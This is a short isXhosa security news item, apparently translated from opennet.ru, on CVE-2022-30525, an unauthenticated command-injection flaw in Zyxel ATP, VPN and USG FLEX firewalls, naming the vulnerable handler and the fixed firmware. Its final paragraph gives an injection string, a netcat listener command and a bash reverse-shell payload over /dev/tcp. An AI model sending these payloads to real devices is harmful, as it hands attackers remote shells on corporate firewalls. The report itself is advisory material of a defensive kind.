Umngcipheko obalulekileyo (i-CVE-2022-30525) ichongiwe kwizixhobo ze-Zyxel ze-ATP, i-VPN kunye ne-USG FLEX series, eyenzelwe ukuququzelela ukusebenza kwee-firewalls, i-IDS kunye ne-VPN kumashishini, evumela umhlaseli wangaphandle ukuba enze ikhowudi isixhobo ngaphandle kwamalungelo omsebenzisi ngaphandle koqinisekiso. Ukwenza uhlaselo, umhlaseli kufuneka akwazi ukuthumela izicelo kwisixhobo esebenzisa i-HTTP/HTTPS protocol. I-Zyxel ilungise ubuthathaka kwi-ZLD 5.30 yohlaziyo lwe-firmware. Ngokutsho kwenkonzo ye-Shodan, ngoku kukho izixhobo ezinokuthi zibe sengozini ye-16213 kwinethiwekhi yehlabathi eyamkela izicelo nge-HTTP / HTTPS.
Umsebenzi wenziwa ngokuthumela imiyalelo eyilwe ngokukodwa kwi-web handler/ztp/cgi-bin/handler, efikelelekayo ngaphandle koqinisekiso. Ingxaki ibangelwa kukunqongophala kococi olululo lweparameters zesicelo xa uphumeza imiyalelo kwisixokelelwano usebenzisa umnxeba we-os.system osetyenziswa kwithala leencwadi lib_wan_settings.py kwaye isetyenziswe xa kusenziwa umsebenzi we-setWanPortSt.
Umzekelo, umhlaseli unokugqithisa umtya β; i-ping 192.168.1.210;" okuya kukhokelela ekuphunyezweni komyalelo othi "ping 192.168.1.210" kwinkqubo. Ukufumana ufikelelo kwiqokobhe lomyalelo, ungabaleka βnc -lvnp 1270β kwindlela yakho, kwaye ngoko uqalise uxhulumaniso olungemva ngokuthumela isicelo kwisixhobo nge '; bash -c \Β»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
umthombo: opennet.ru